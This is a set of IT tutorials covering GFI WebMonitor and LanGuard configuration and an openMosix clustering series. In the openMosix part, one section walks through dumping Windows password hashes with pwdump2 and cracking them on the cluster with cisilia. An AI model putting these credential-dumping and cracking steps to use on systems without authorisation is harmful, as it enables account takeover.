Figure 6. Internet traffic flow in WebMonitor’s Gateway Mode

Administrators can select the port at which the Transparent Proxy will function and then click Save and Test Transparent Proxy. GFI WebMonitor will confirm Transparent Proxy is working properly.

Now, click Next to see your trial license key or enter a new license key. Click on Next to enable HTTPS scanning.

HTTPS Scanning gives you visibility into secure surfing sessions that can threaten the network's security. Malicious content may be included in sites visited or files downloaded over HTTPS. The HTTPS filtering mechanism within GFI WebMonitor enables you to scan this traffic. There are two ways to configure HTTPS Proxy Scanning Settings, via the integrated HTTPS Scanning Wizard or manually.

Thanks to GFI WebMonitor’s flexibility, administrators can add any HTTPS site to the HTTPS scanning exclusion list so that it bypasses inspection.

If HTTPS Scanning is disabled, GFI WebMonitor enables users to browse HTTPS websites without decrypting and inspecting their contents.

When ready, click Next again and provide the full path of the database. Click Next again to enter and validate the Admin username and password. Then, click Next to restart the services. You can now enter your email details and click Finish to end the installation.

gfi-webmonitor-installation-setup-gateway-proxy-mode-7a

Figure 7. GFI WebMonitor’s main control panel

Once the installation and initial configuration of GFI WebMonitor is complete, the system will begin gathering useful information on our users’ internet usage.

In this article we examined WebMonitor Simple Proxy and Gateway installation mode and saw the benefits of each method. We proceeded with the Gateway mode to provide us with greater flexibility, granularity and reporting of our users’ internet usage. The next articles will continue covering in-depth functionality and reporting of GFI’s WebMonitor.


GFI WebMonitor: Monitor & Secure User Internet Activity, Stop Illegal File Sharing - Downloads (Torrents), Web Content Filtering For Organizations

gfi-webmonitor-internet-filtering-block-torrents-applications-websites-reporting-1

In our previous article we analysed the risks and implications involved for businesses when there are no security or restriction policies and systems in place to stop users distributing illegal content (torrents). We also spoke about unauthorized access to company systems, sharing sensitive company information and more. This article talks about how specialized systems such as WebMonitor are capable of helping businesses stop torrent applications accessing the internet, control the websites users access, block remote control software (TeamViewer, Remote Desktop, Ammy Admin etc) and put a stop to users wasting bandwidth, time and company money while at work.

WebMonitor is more than just an application. It can help IT departments design and enforce internet security policies by blocking or allowing specific applications and services accessing the internet.

WebMonitor is also capable of providing detailed reports of users' web activity – a useful feature that ensures users are not accessing online resources they shouldn't, and provides the business with the ability to check users' activities in the event of an attack, malware infection or security incident.

WebMonitor is not a new product - it carries over a decade of development and has served millions of users since its introduction into the IT market. With awards from popular IT security magazines, Security Experts, IT websites and more, it’s the preferred solution when it comes to a complete web filtering and security monitoring solution.

Blocking Unwanted Applications: Application Control – Not Port Control

Senior IT Managers, engineers and administrators surely remember the days when controlling TCP/UDP ports at the firewall level was enough to block or grant applications access to the internet. For some years now, this has no longer been a valid way of controlling applications, as most ‘unwanted’ applications can smartly use common ports such as HTTP (80) or HTTPS (443) to circumvent security policies, passing inspection and freely accessing the internet.

In order to effectively block unwanted applications, businesses must realize that it is necessary to have a security gateway device that can correctly identify the applications requesting access to the internet, regardless of the port they are trying to use – aka Application Control.

Application Control is a sophisticated technique that requires upper layer (OSI Model) inspection of data packets as they flow through the gateway or proxy, e.g. GFI WebMonitor. The gateway/proxy executes deep packet level inspection to identify the application requesting access to the internet.

In order to correctly identify the application the gateway must be aware of it, which means it has to be listed in its local database.

The Practical Benefits Of Internet Application Control & Web Monitoring Solution

Let’s take a more practical look at the benefits an organization has when implementing an Application Control & Web Monitoring solution:

  • Block file sharing applications such as Torrents
  • Stop users distributing illegal content (games, applications, movies, music, etc)
  • Block remote access applications such as TeamViewer, Remote Desktop, VNC, Ammy Admin and more.
  • Stop unauthorized access to the organization’s systems via remote access applications
  • Block access to online storage services such as DropBox, Google Drive, Hubic and others
  • Avoid users sharing sensitive information such as company documents via online storage services
  • Save valuable bandwidth for the organization, its users, remote branches and VPN users
  • Protect the network from malware, viruses and other harmful software downloadable via the internet
  • Properly enforce different security policies to different users and groups
  • Protect against possible security breaches and minimize responsibility in case of an infringement incident
  • And much more

The above list contains a few of the major benefits that solutions such as WebMonitor can offer to organizations.

Why Web Monitoring & Content Filtering is Considered Mandatory

Web monitoring is a very sensitive topic for many organizations and their users, mainly because users do not want others to know what they are doing on their computers. The majority of users perceive web monitoring as spying – checking which sites they access and whether they are wasting time on websites and internet resources unrelated to work. However, users rarely understand the problems and security risks that are most likely to arise if no monitoring or content filtering mechanism is in place.

In fact, the damage caused by users irresponsibly visiting high-risk sites and surfing the internet without any limits is far greater than most companies might think, and there are some good examples that prove this point. The FBI website has a page with examples of internet scams and risks originating from social media networking sites.

If we assume your organization is one of the lucky ones that hasn’t been hit (yet) by irresponsible user internet activity, then we are here to assure you that it’s simply a matter of time.

Apart from the imminent security risk, users with uncontrolled access also waste bandwidth – bandwidth the organization is paying for – and are likely to slow down the internet for everyone else who is legitimately trying to get work done. In cases where VPNs run over the same lines, VPN users, remote branches and mobile users are most likely to experience slow connection speeds when accessing the organization’s resources over the internet.

This problem becomes even more evident when asymmetrical WAN lines, such as ADSL, are in use. On an asymmetrical line, a single user who is uncontrollably uploading photos, movies (via torrent) or other content can affect everyone else’s downloads, since a bottleneck easily occurs when either of the two streams (downstream or upstream) is under heavy usage.

Finally, if there is an organization security policy in place it’s most likely to contain fair internet usage guidelines for users and specify what they can and cannot do using the organization’s internet resources. The only way to enforce such a policy is through a sophisticated web monitoring & policy enforcement mechanism such as GFI WebMonitor.

Summary

In this article we analysed how specialized web monitoring and control software, such as WebMonitor, can control which user applications are allowed to access the internet, control which websites users within an organization can access, and block unwanted internet content while saving valuable bandwidth. With such solutions, organizations can enforce their internet security policies while at the same time protecting themselves from unauthorized access to their systems (remote desktop software), stopping illegal activities such as torrent file sharing and more.


Dealing with User Copyright Infringement (Torrents), Data Loss Prevention (DLP), Unauthorized Remote Control Applications (Teamviewer, RDP) & Ransomware in the Business Environment

One of the largest problems faced by organizations of any size is effectively controlling user internet access (from laptops, mobile devices, workstations etc), minimizing security threats for the organization (ransomware, data loss), dealing with user copyright infringement (torrent downloading/sharing of movies, games, music etc) and discovering where valuable WAN/internet bandwidth is being wasted.

Organizations clearly understand that using a Firewall is no longer adequate to control the websites its users are able to access, remote control applications (Teamviewer, Radmin, Ammyy Admin, Remote desktop etc), file sharing applications - Bittorrent clients (uTorrent, BitComet, Deluge, qBittorrent etc), online cloud storage services (Dropbox, OneDrive, Google Drive, Box, Amazon Cloud Drive, Hubic etc) and other services and applications.

The truth is that web monitoring applications such as GFI’s WebMonitor are a lot more than just a web proxy or internet monitoring solution.

Web monitoring applications are essential for any type or size of network as they offer many advantages:

  • They stop users from abusing internet resources
  • They block file-sharing applications and illegal content sharing
  • They stop users using cloud-based file services to upload sensitive documents, for example saving company files to their personal DropBox, Google Drive etc.
  • They stop remote control applications connecting to the internet (e.g Teamviewer, Remote Desktop, Ammy Admin etc)
  • They ensure user productivity is kept high by allowing access to approved internet resources and sites
  • They eliminate referral ad sites and block abusive content
  • They support reputation blocking to automatically filter websites based on their reputation
  • They help IT departments enforce security policies to users and groups
  • They provide unbelievable flexibility allowing any type or size of organization to customise its internet usage policy to its requirements

The Risk In The Business Environment – Illegal Downloading

Most businesses are completely unaware of how serious these matters are and the risks they are taking while dealing with other ‘more important’ matters.

Companies such as the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA) are in a continuous battle suing and fighting with companies, ISPs and even home users for illegally distributing movies and music.

Many users are aware of this and are now turning to their company’s internet resources, which in many cases offer faster and unlimited data transfer, to download their illegal content such as movies, games, music and other material.

An employer or business can be easily held responsible for the actions of its employees when it comes to illegal download activities, especially if no policies or systems are in place.

In the case of an investigation, if the necessary security policies and web monitoring systems are in place to prevent copyright infringement and illegal downloading, the business is far less exposed to the legal implications of its users’ actions, and it is also able to track down and identify the person responsible.

Data Loss Prevention (DLP) – Stop Users From Uploading Sensitive/Critical Documents

While illegal downloading is one major threat for businesses, stopping users from sharing company data and sensitive information (aka Data Loss Prevention or DLP) is another big problem.

With the explosion of (free) cloud-based storage services such as DropBox, OneDrive, Google Drive and others, users can quickly and easily upload any type of document directly from their workplace to their personal cloud storage and instantaneously share it with anyone in the world, without the company’s consent or knowledge.

The smartly designed cloud-storage applications are able to use HTTP & HTTPS to transfer files, and circumvent firewall security policies and other types of protection.

More specialised application proxies such as GFI’s WebMonitor can effectively detect and block these applications, saving businesses from major security breaches and damages.

Block Unauthorized Remote Control Applications (TeamViewer, Ammy Admin, Remote Desktop, VNC etc) & Ransomware

Remote control applications such as Teamviewer, Ammy Admin, Remote Desktop and others have been causing major security issues in organizations around the world. In most cases, users run these clients so they can remotely access and control their workstation from home, continuing their “downloads”, transferring files to their home PC and carrying out other unauthorized activities.

In other cases, these remote applications become targets for pirates and hackers, who try to hijack sessions that have been left running by users.

Ransomware is a type of threat where, through an application running on a user’s workstation, hackers gain access and encrypt the files found on the computer, including network drives and shares within the company.

In late 2015, the popular remote control software Ammy Admin was injected with malicious code, and unaware home and corporate users downloaded and used the infected free software. Compromised by at least five different malware variants, their PCs gave attackers full access and control. Some of the malware facilitated stealing banking details, while other variants encrypted user files and demanded money to decrypt them.

In another case during 2015, attackers began installing ransomware on computers running Remote Desktop Services. The attackers obtained access via brute-force attack and then installed their malware which started scanning for specific file extensions. A ransom of $1000 USD was requested in order to have the files decrypted.

Blocking this type of application is a major issue for companies, as users make uncontrolled use of them without realizing they are putting their company at serious risk.

Use of such applications should be heavily monitored and restricted because they pose a significant threat to businesses.

GFI’s WebMonitor’s extensive application list has the ability to detect and effectively block these and many other similar applications, putting an end to this major security threat.

Summary

The internet today is certainly not a safe place for users or organizations. Security threats resulting from users downloading and distributing illegal content, sharing sensitive company information and uncontrollably accessing their systems from home or other locations, along with the potential hazard of attackers gaining access to internal systems via RDP programs, are real. Avoid getting your company caught off guard and seek ways to tighten and enforce security policies that will help protect it from these ever-present threats.


Automate Software Deployment with the Help of GFI LanGuard. Quick & Easy Software Installation on all PCs – Workstations & Servers

Deploying a single application to hundreds of workstations or servers can be a very difficult and time-consuming task. Thankfully, remote deployment of software and applications is a feature offered by GFI LanGuard. With Remote Software Deployment, we can automate the installation of pretty much any software to any number of computers on the network, including Windows servers (2003, 2008, 2012), Domain Controllers, Windows workstations and more.

In this article we’ll show how easy it is to deploy any custom software using GFI LanGuard. For our demonstration purposes, we’ll deploy Mozilla Firefox to a Windows server.

To begin configuring the deployment, select the Remediate tab from GFI LanGuard, then select the Deploy Custom Software option as shown below:

Figure 1. Preparing the network-wide deployment of Mozilla Firefox through GFI LanGuard

Next, select the target machine from the left panel. We can select one or multiple targets using the CTRL key. For our demonstration, we selected the DCSERVER which is a Windows 2003 server.

Now, from the Deploy Custom Software section, click on Add to select the software to be deployed. This will present the Add Custom Software window where we can select the path to the installation file. GFI LanGuard also provides the ability to run the setup file using custom parameters – this handy feature allows the execution of silent installations (no window/prompt shown at the target machine desktop), if supported by the application to be installed. Mozilla Firefox supports silent installation using the ‘ –ms ‘ parameter:

Figure 2. GFI LanGuard custom software deployment using a parameter for silent installation
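If you’d like to verify the silent switch by hand before deploying network-wide, running the installer locally on a test machine with the same parameter should complete without displaying any windows (the path below is just an illustrative example of where the setup file might be stored):

"C:\Temp\Firefox Setup.exe" -ms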

When done, click on the Add button to return back to the main screen where GFI LanGuard will display the target computer(s) & software selected, plus installation parameters:

Figure 3. GFI LanGuard ready to deploy Mozilla Firefox on a Windows Server

Clicking on the Deploy button brings up the final window where we can either initiate the deployment immediately or schedule it for a later time. From here, we can also insert any necessary credentials but also select to notify the remote user, force a reboot after the installation and many other useful options:

Figure 4. Final configuration options for remote deployment of Mozilla Firefox via GFI LanGuard

GFI LanGuard’s remote software deployment is so sophisticated that it even allows the configuration of the number of threads that will be executed on the remote computer (under the Advanced options link), helping ensure minimum impact for the user working on the remote system.

Once complete, click on OK to proceed with the remote deployment. LanGuard will then return back to the Remediation window and provide real-time update of the installation process, along with a detailed log below:

Figure 5. GFI LanGuard Remote software deployment of Mozilla Firefox complete

Installation of Mozilla Firefox was incredibly fast and, to our surprise, the impact on the remote host was undetectable. We actually didn’t realise the installation was taking place until the Firefox icon appeared on the desktop. The CPU history also confirms there was no additional load on the server:

Figure 6. Successful installation of Mozilla Firefox, without any system performance impact!

GFI LanGuard’s software deployment feature is truly impressive. It not only provides network administrators with the ability to deploy software on any machine on their network, but also gives complete control over the way the software is deployed and the resources used on the remote computer during the installation. Additional options such as scheduling the deployment, custom user messages before or after the installation, remote reboot and many more make GFI LanGuard a necessary tool for any organization.


How to Manually Deploy – Install GFI LanGuard Agent When Access is Denied By Remote Host (Server – Workstation)

When IT administrators and managers are faced with the continuous failure of GFI LanGuard Agent deployment (e.g. Access is denied), it is best to switch to manual installation in order to save valuable time and resources. The failure can be caused by incorrect credentials, a disabled account, firewall settings, disabled remote access on the target computer and more. Deploying GFI LanGuard Agents is the best way to scan your network for unpatched machines or machines with critical vulnerabilities.

Figure 1. GFI LanGuard Agent deployment failing with Access is denied

Users interested can also check our article Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning and Deployment.

Step 1 – Locate Agent Package On GFI LanGuard Server

The GFI LanGuard Agent installation file is located in one of the following directories, depending on your operating system:

  • For 32bit operating systems: c:\Program Files\GFI\LanGuard 11\Agent\
  • For 64bit operating systems: c:\Program Files (x86)\GFI\LanGuard 11\Agent\

Figure 2. The location of GFI LanGuard Agent on our 64bit O/S.

Step 2 – Copy The File To The Target Machine & Install

Once the file is copied to the target machine, execute it using the following single line command prompt:

c:\LanGuard11agent.msi /qn GFIINSTALLID="InstallationID" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv"

Note: InstallationID is an ID that can be found in the crmiini.xml file located on the GFI LanGuard server directory for 32bit O/S: c:\Program Files\GFI\LanGuard 11 Agent  or c:\Program Files (x86)\GFI\LanGuard 11 Agent for 64bit O/S.
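A quick way to display the contents of that file and locate the ID from a command prompt is shown below (the 64-bit path is used here; substitute the 32-bit path from the note above where applicable):

type "c:\Program Files (x86)\GFI\LanGuard 11 Agent\crmiini.xml"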

Following is a screenshot of the contents of our crmiini.xml file where the installation ID is clearly shown:

Figure 3. Installation ID in crmiini.xml file on our GFI LanGuard Server

With this information, the final command line (DOS) for the installation of the Agent will be as follows:

LanGuard11agent.msi /qn GFIINSTALLID="e86cb1c1-e555-40ed-a6d8-01564bdb969e" /norestart /L*v "%temp%\LANSS_v11_AgentKitLog.csv"

Note: Make sure the command prompt is run with Administrator Privileges (Run as Administrator), to ensure you do not have any problems with the installation.

Here is a screenshot of the whole command executed:

Figure 4. Successfully Installing GFI LanGuard Agent On Workstations & Servers

Notice that the installation is a ‘silent install’ and will not present any message or prompt the user for a reboot. This makes it ideal for quick deployments where no reboot and minimum user interruption is required.

A restart will be necessary to complete the Agent initialization.

Important Notes

After completing the manual installation of the GFI LanGuard Agent, it is necessary to also deploy the Agent remotely from the GFI LanGuard console; otherwise the GFI LanGuard server will not be aware of the Agent manually installed on the remote host.

Also, it is necessary to deploy at least one Agent remotely via the GFI LanGuard server console before attempting the manual deployment, in order to initially populate the crmiini.xml file with the installation ID parameters.

This article covered the manual deployment of GFI’s LanGuard Agent on Windows-based machines. We took a look at common reasons why remote deployment of the Agent might fail, and covered step-by-step the manual installation process and prerequisites to ensure the Agent is able to connect to the GFI LanGuard server.


Benefits of Deploying GFI LanGuard Agents on Workstations & Servers. Automate Network-wide Agent Scanning & Deployment

GFI LanGuard Agents are designed to be deployed on local (network) or remote servers and workstations. Once installed, the GFI LanGuard Agents can be configured via LanGuard’s main server console, giving the administrator full control over when the Agents scan the host they are installed on and communicate their status to the GFI LanGuard server.

Those concerned about system resources will be pleased to know that the GFI LanGuard Agent does not consume any CPU cycles or resources while idle. During the time of scanning, once a day for a few minutes, the scan process is kept at a low priority to ensure that it does not interfere or impact the host’s performance.

GFI LanGuard Agents communicate with the GFI LanGuard server using TCP port 1070, however this can be configured.
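If you suspect connectivity problems between an Agent and the server, a quick way to check whether anything is listening on or using the default port on a given machine is the following command-prompt one-liner (replace 1070 if you changed the port):

netstat -ano | findstr :1070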

Let’s see how we can install the GFI LanGuard Agent from the server’s console.

First open GFI LanGuard and select Agents Management from the Configuration tab:

Figure 1. Select Agents Management and then Deploy Agents

Next, you can choose between Local domain or Custom to define your target(s):

Figure 2. Defining Target rules for GFI LanGuard Agent deployment

Since we’ve selected Custom, we need to click on Add new rule to add our targets.

The targets can be defined via their Computer name (shown below), Domain name or Organization Unit:

Figure 3. Defining our target hosts using their Computer name

When complete, click on OK to return to the previous window.

We now see all computer hosts selected:

Figure 4. Viewing selected hosts for Agent deployment

The Advanced Settings option in the lower left area of the window allows us to configure the automatic discovery of machines with Agents installed, set up the Audit schedule of the Agent (when it will scan its host and update the LanGuard server), choose the Scan profile used by the Agent, and enable an extremely handy feature called Auto Remediation, which lets GFI LanGuard automatically download and install missing updates and service packs, uninstall unauthorized applications and more on the remote computers.

Figure 5. GFI LanGuard - Agent Advanced Settings – Audit Schedule tab

The screenshot below shows us the Auto Remediation tab settings:

Figure 6. Agent Advanced Settings – Auto Remediation tab

When done, click on OK to save the selected settings and return back to the previous window.

Now click on Next to move to the next step. At this point, we need to enter the administrator credentials of the remote machine(s) so that GFI LanGuard can log into the remote machines and deploy the agent. Enter the username and password and hit Next and then Finish at the last window:

Figure 7. Entering the necessary credentials for the Agent deployment

GFI LanGuard will now begin the deployment of its Agent to the selected remote hosts:

Figure 8. GFI LanGuard preparing for the Agent deployment

After a while, the LanGuard Agent will report its installation status. Where successful, we will see the Installed message; otherwise a Pending install message will continue to be displayed, along with an error if the deployment was unsuccessful:

Figure 9. LanGuard Agent installation status

Common causes of a failed Agent deployment are incorrect credentials, firewall restrictions or insufficient user rights.

To check the status of the installed Agent, we can simply select the desired host, right-click and select Agent Diagnostic as shown below:

Figure 10. Accessing GFI LanGuard Agent Diagnostics

The Agent Diagnostic window is an extremely helpful feature as it provides a great amount of information on the Agent and the remote host. In addition, at the end of the Diagnosis Activity window, we’ll find a zip file that contains all of the presented information. This file can be emailed to GFI’s support in case of Agent problems:

Figure 11. Running the Agent Diagnostics report

The GFI LanGuard Agent is an extremely useful feature that allows the automatic monitoring, patching and updating of the host machine, leaving IT Administrators and Managers free to deal with other important tasks. Thanks to its Domain & Workgroup support, GFI LanGuard can handle any type and size of environment. If you haven’t used it yet, download your copy of GFI LanGuard and give it a try – you’ll be surprised how much valuable information you’ll get on your systems’ security & patching status and the time you’ll save!


How to Configure Email Alerts in GFI LanGuard 2015 – Automating Alerts in GFI LanGuard

One of the most important features in any network security monitoring and patch management application such as GFI’s LanGuard is the ability to automate tasks, e.g. automatic network scanning, email alerts etc. This allows IT Administrators, Network Engineers, IT Managers and other IT department members to continue working on other important matters, with the peace of mind that the security application is keeping things under control and will alert them instantly upon any change detected within the network or in the vulnerability status of the monitored hosts.

GFI LanGuard’s email alerting feature can be easily accessed from the main Dashboard, where the Alerting Options notification warning usually appears at the bottom of the screen:

Figure 1. GFI LanGuard email alerting Option Notification

Or alternatively, by selecting Configuration from the main menu and then Alerting Options from the left side area below:

Figure 2. Accessing Alerting Options via the menu

Once in the Alerting Options section, simply click on the click here link to open the Alerting Options Properties window. Here, we enter the details of the email account that will be used, the recipients and the SMTP server:

Figure 3. Entering email, recipient & SMTP account details

Once the information has been correctly provided, we can click on the Verify Settings button and the system will send the recipients a test notification email. For an IT department, a group email address can be configured to ensure all members of the department receive alerts and notifications.

Finally, on the Notification tab we can enable and configure a daily report that will be sent at a specific time of day and also select the report format. GFI LanGuard supports multiple formats such as PDF, HTML, MHT, RTF, XLS, XLSX & PNG.

Figure 4. GFI LanGuard Notification Window settings

When done, simply click on the OK button to return back to the Alerting Options window.

GFI LanGuard will now send an automated email alert on a daily basis whenever there are changes identified after a scan.

This article showed how GFI LanGuard, a network security scanner, vulnerability scanner and patch management application, can be configured to automatically send email alerts and reports on network changes after every scan.


How to Scan Your Network and Discover Unpatched, Vulnerable, High-Risk Servers or Workstations using GFI LanGuard 2015

This article shows how any IT administrator, network engineer or security auditor can quickly scan a network using GFI’s LanGuard and identify the different systems on it, such as Windows, Linux, Android etc. More importantly, we’ll show how to uncover vulnerable, unpatched or high-risk systems including Windows Server 2003, Windows Server 2008, Windows Server 2012 R2, Domain Controllers, Linux servers such as RedHat Enterprise, CentOS, Ubuntu, Debian, openSUSE, Fedora, any type of Windows workstation (XP, Vista, 7, 8, 8.1, 10) and Apple OS X.

GFI’s LanGuard is a Swiss Army knife that combines a network security tool, vulnerability scanner and patch management system in one package. Using the network scanning functionality, LanGuard will automatically scan the whole network and use the provided credentials to log into every located host and discover additional vulnerabilities.

To begin, we launch GFI LanGuard and at the startup screen, select the Scan Tab as shown below:

Figure 1. Launching GFI LanGuard 2015

Next, in the Scan Target section, select Custom target properties (box with dots) and click on Add new rule. This will bring us to the final window where we can add any IP address range or CIDR subnet:

 

Figure 2. Adding your IP Network – Subnet to LanGuard for scanning

Now enter the IP address range you would like LanGuard to scan, e.g 192.168.5.1 to 192.168.5.254 and click OK.

The new IP address range should now appear in the Custom target properties window:

Figure 3. Custom target properties displays selected IP address range

Now click on OK to close the Custom target properties window and return back to the Scan area:

Figure 4. Returning back to LanGuard’s Scan area

At this point, we can enter the credentials (username/password) to be used for remotely accessing the discovered hosts (e.g. domain administrator credentials are a great idea) and optionally click on Scan Options to reveal additional useful options to be used during our scan, such as Credential Settings and Power saving options. Click on OK when done:

Figure 5. Additional Scan Options in GFI’s LanGuard 2015

We can now hit Scan to begin the host discovery and scan process:

Figure 6. Initiating the discovery process in GFI LanGuard 2015

GFI LanGuard will begin scanning the selected IP subnet and list all hosts found in the Scan Results Overview window area. As shown in the above screenshot, each host will be identified according to its operating system and will be assessed for open ports, vulnerabilities and missing operating system & application patches.

The full scan profile selected will force GFI LanGuard to run a complete detailed scan of every host.

Once complete, GFI LanGuard 2015 displays a full report summary for every host and an overall summary for the network:

Figure 7. GFI LanGuard 2015 overall scan summary and results

Users can select each host individually from the left window and its Scan Results will be displayed in the right window area (Scan Results Details). This method allows quick navigation through each host, and also allows the administrator or network security auditor to quickly locate the specific scan results they are after.

This article explained how to configure GFI LanGuard 2015 to scan an IP subnet, identify host operating systems, log into remote systems and scan for vulnerabilities, missing operating system and application patches, open ports and other critical security issues. IT Managers, network engineers and security auditors should definitely try GFI LanGuard and see how easy and automated their job can become with such a powerful network security tool in their hands.


OpenMosix - Part 9: Interesting Ideals: Distributed Password Cracking & Encoding MP3s

Now that you hopefully have a nice powerful cluster running, there are hundreds of different ways you can use it. The most obvious use is any activity that takes a long time and uses a large amount of CPU processing power and/or RAM. We're going to show you a couple of projects that have benefited us in the real world.

Bear in mind that there are some applications that migrate very nicely over an openMosix cluster; for example, 'make' can speed up your compile times significantly. If you do a little research on the net, you'll find examples of applications that migrate well and of those which won't yield much of a speed increase. If you are a developer looking to take advantage of openMosix, applications that fork() child processes will migrate wonderfully, whereas multithreaded applications, at present, do not seem to migrate their threads.
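For instance, when compiling on the cluster you can tell make to spawn several compile jobs in parallel, giving openMosix independent processes to migrate between nodes (the job count below is just an illustrative value – pick something close to the total number of CPUs in your cluster):

make -j 8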

Anyway, here are a couple of cool uses for your cluster:

Distributed Password Cracking

If you work in a security role or as a penetration tester, you'll probably encounter the need to crack passwords at some point or other. We regularly use l0phtcrack for Windows passwords, but were intrigued by the opportunity to use our nice new 10-system cluster to significantly speed things up. After briefly hunting around the net, we discovered 'Cisilia', a Linux-based Windows LM/NTLM password cracker designed specifically to take advantage of openMosix-style clustering!

You can get a copy of cisilia by visiting the following site and clicking on the R&D Projects menu on the left: http://www.citefa.gov.ar/SitioSI6_EN/si6.htm

There you'll find two files, 'cisilia' which is the actual command line based password cracking engine and 'xisilia' which is an X based GUI for the same. We didn't install the X based GUI, since we were working with our cluster completely over SSH.

Once you download the RPMs, you can install them by typing:

rpm -ivh *isilia*.rpm

If you installed from the tarball sources like we did, it is just as simple:

1) Unzip the tarball

tar xvzf cisilia*.tar.gz

2) Enter the directory and configure the compilation process for your system:

./configure

3) Finally, start the compilation process:

make

Now you need to get a Windows password file to crack. For this you'll want to use pwdump to grab the encrypted password hashes. This is available at the following link:

https://packetstormsecurity.com/files/13790/pwdump2.zip.html

Unzip it and run it on the Windows box which has the passwords you want to crack. You will want to save the results to a file, so do the following:

pwdump2 > passwdfile

Now copy the file 'passwdfile' across to a node in your cluster. Fire up cisilia using the following command:

cisilia -l crack_file -n 20 <path to the passwdfile you copied>

•  -l   tells cisilia to save the results to a file called crack_file

•  -n  tells cisilia how many processes it should spawn. We started 20, since we wanted 2 processes to go to each node in the cluster.

We were pleasantly surprised by how quickly it started running through 6-7 character alphanumeric passwords. Enjoy !

Encoding MP3s

Do you get annoyed by how long it takes to convert a CD to MP3? Or to convert any kind of media file?

This is one of the places where a cluster excels. When you convert your rips to MP3, you normally only process one WAV file at a time – so how about running the job on your cluster and letting it encode all your files simultaneously?

Someone has already taken this to the absolute extreme, check out http://www.rimboy.com/cluster/ for what he's got setup.

To quickly rip a CD and convert it to digital audio, you will need 2 programs:

A digital audio extractor, and an audio encoder.

For the digital audio extractor we recommend Cdparanoia. For the audio encoder, we're going to do things a bit differently:

In the spirit of the free open source movement, we suggest you check out the OGG Vorbis encoder. This is a free, open audio compression standard that will compress your WAV files much better than MP3, and still have a higher quality!

They also play perfectly in Winamp and other media players. Sounds too good to be true? Check out their website at the link below. Of course if you still aren't convinced that OGG is better than MP3, you can replace the OGG encoder with any MP3 encoder for this tutorial.

Get and install both the cdparanoia ripper and the oggenc encoder from the following URLs:

CDparanoia - http://www.xiph.org/paranoia/

OGG Vorbis Encoder - https://xiph.org/vorbis/

Now we just need to rip and encode on our cluster. Put the CD you want to convert in the drive on one node, and just run the following:

cdparanoia -B

for i in *.wav; do
  oggenc "$i" &
done

This encodes your WAV files to OGG format at the default quality level of 3, which produces an OGG file of a smaller size and significantly better sound quality than an MP3 at 128kbps. You can experiment with the OGG encoder options to figure out the best audio quality for your requirements.
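If you want to trade file size for quality, oggenc's -q switch sets the quality level (roughly -1 up to 10, with higher values meaning better quality and larger files). For example, encoding a single file – the filename here is just an example – at quality 6:

oggenc -q 6 track01.wav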

This just about completes the openMosix tutorial we've prepared for you.

We sincerely hope it has been an enlightening tutorial and that it will help most of you make some good use of those old 'mini supercomputers' you never knew you had :)

Back to the Linux/Unix Section or OpenMosix Section.


OpenMosix - Part 8: Using SSH Keys Instead Of Passwords

One of the things that you'll notice with openMosixview is that if you want to change the speed sliders of a remote node, you will have some trouble. This is because openMosixview uses SSH to remotely set the speed on the node. What you need to do is set up passwordless SSH authentication using public/private keys.

This is just a quick walk-through on how to do that, for a much more detailed explanation on public/private key SSH authentication, see our tutorial in the GNU/Linux Section.

First, generate your SSH public/private key-pair:

ssh-keygen -t dsa

Second, copy the public key into the authorized keys file. Since your home directory is shared between nodes, you only need to do this on one node:

cat ~/.ssh/*.pub >>~/.ssh/authorized_keys

However, for root, you will have to do this manually for each node (replace Node# with each node individually):

cat ~/.ssh/*.pub >>/mfs/Node#/root/.ssh/authorized_keys

After this, you have to start SSH-agent, to cache your password so you only need to type it once. Add the following to your .bash_profile or .profile:

ssh-agent $SHELL

Now, each time after you log in, just type 'ssh-add' and supply your password once. By following this you will be able to log in to any of the nodes without a password, and the sliders in openMosixview should work perfectly for you. Next: Interesting Ideals: Distributed Password Cracking & Encoding MP3s


OpenMosix - Part 7: The openMosix File System

You've probably been wondering how openMosix handles things like file read/writes when a process migrates to another node.

For example, if we run a process that needs to read some data from a file /etc/test.conf on our local machine, and this process migrates to another node, how will openMosix read that file? The answer is the openMosix File System, or OMFS.

OMFS does several things. Firstly, it shares your disk between all the nodes in the cluster, allowing them to read and write to the relevant files. It also uses what is known as Direct File System Access (DFSA), which allows a migrated process to run many system calls locally, rather than wasting time executing them on the home node. It works somewhat like NFS, but has features that are required for clustering.

If you installed openMosix from the RPMs, the omfs should already be created and automatically mounted. Have a look in /mfs, and you will see a subdirectory for every node in the cluster, named after the node ID. These directories will contain the shared disks of that particular node.

You will also see some symlinks like the following:

here -> maps to the current node where your process runs

home -> maps to your home node

If the /mfs directory has not been created, you can mount it manually with the following:

mkdir /mfs

mount /mfs /mfs -t mfs

If you want it to be automatically mounted at boot time, you can create the following entry in your /etc/fstab

mfs_mnt /mfs mfs dfsa=1 0 0

Bear in mind that this entry has to be on all the nodes in the cluster. Lastly, you can turn the openMosix file system off using the command:

mosctl nomfs

Now that we've got that all covered, it's time to take a look at how you can make the SSH login process less time consuming, allowing you to take control of all your cluster nodes any time you require, and also helping the cluster system execute special functions. The next topic covers using SSH keys with openMosix instead of passwords.


OpenMosix - Part 6: Controlling Your OpenMosix Cluster

The openMosix team have provided a number of ways of controlling your cluster, both from the command line, as well as through GUI based tools in X.

From the command line, the main monitoring and control tools are:

  • mosmon – which shows you the load on each of the nodes, their speed, memory usage, etc. Pressing 'h' will bring up the help with the different options;
  • mosctl - which is a very powerful command that allows you to control how your system behaves in the cluster, some of the interesting options are:
    • mosctl block – this stops other people's processes being run on your system (a bit selfish don't you think ;))
    • mosctl -block – the opposite of the above
    • mosctl lstay – this stops your local processes migrating to other nodes for processing
    • mosctl nolstay – the opposite of the above
    • mosctl setspeed <number> - which sets the max processing speed to contribute. 10000 is a benchmark of a Pentium 3 1Ghz.
    • mosctl whois <node number> - this tells you the IP address of a particular node
    • mosctl expel – this expels any current remote processes and blocks new ones from coming in
    • mosctl bring – this brings back any of your own local processes that have migrated to other nodes
    • mosctl status <node number> - which shows you whether the node is up and whether it is 'blocking' processes, 'staying' them, etc.
  • mosrun - allows you to run a process controlling which nodes it should run on
  • mps - this is just like 'ps' to show you the process listing, but it also shows which node a process is running on
  • migrate - this command allows you to manually migrate a process to any node you like, the syntax for using it is 'migrate <pid> <node #>'. You can also use 'migrate <pid> balance' to load balance a process automatically.
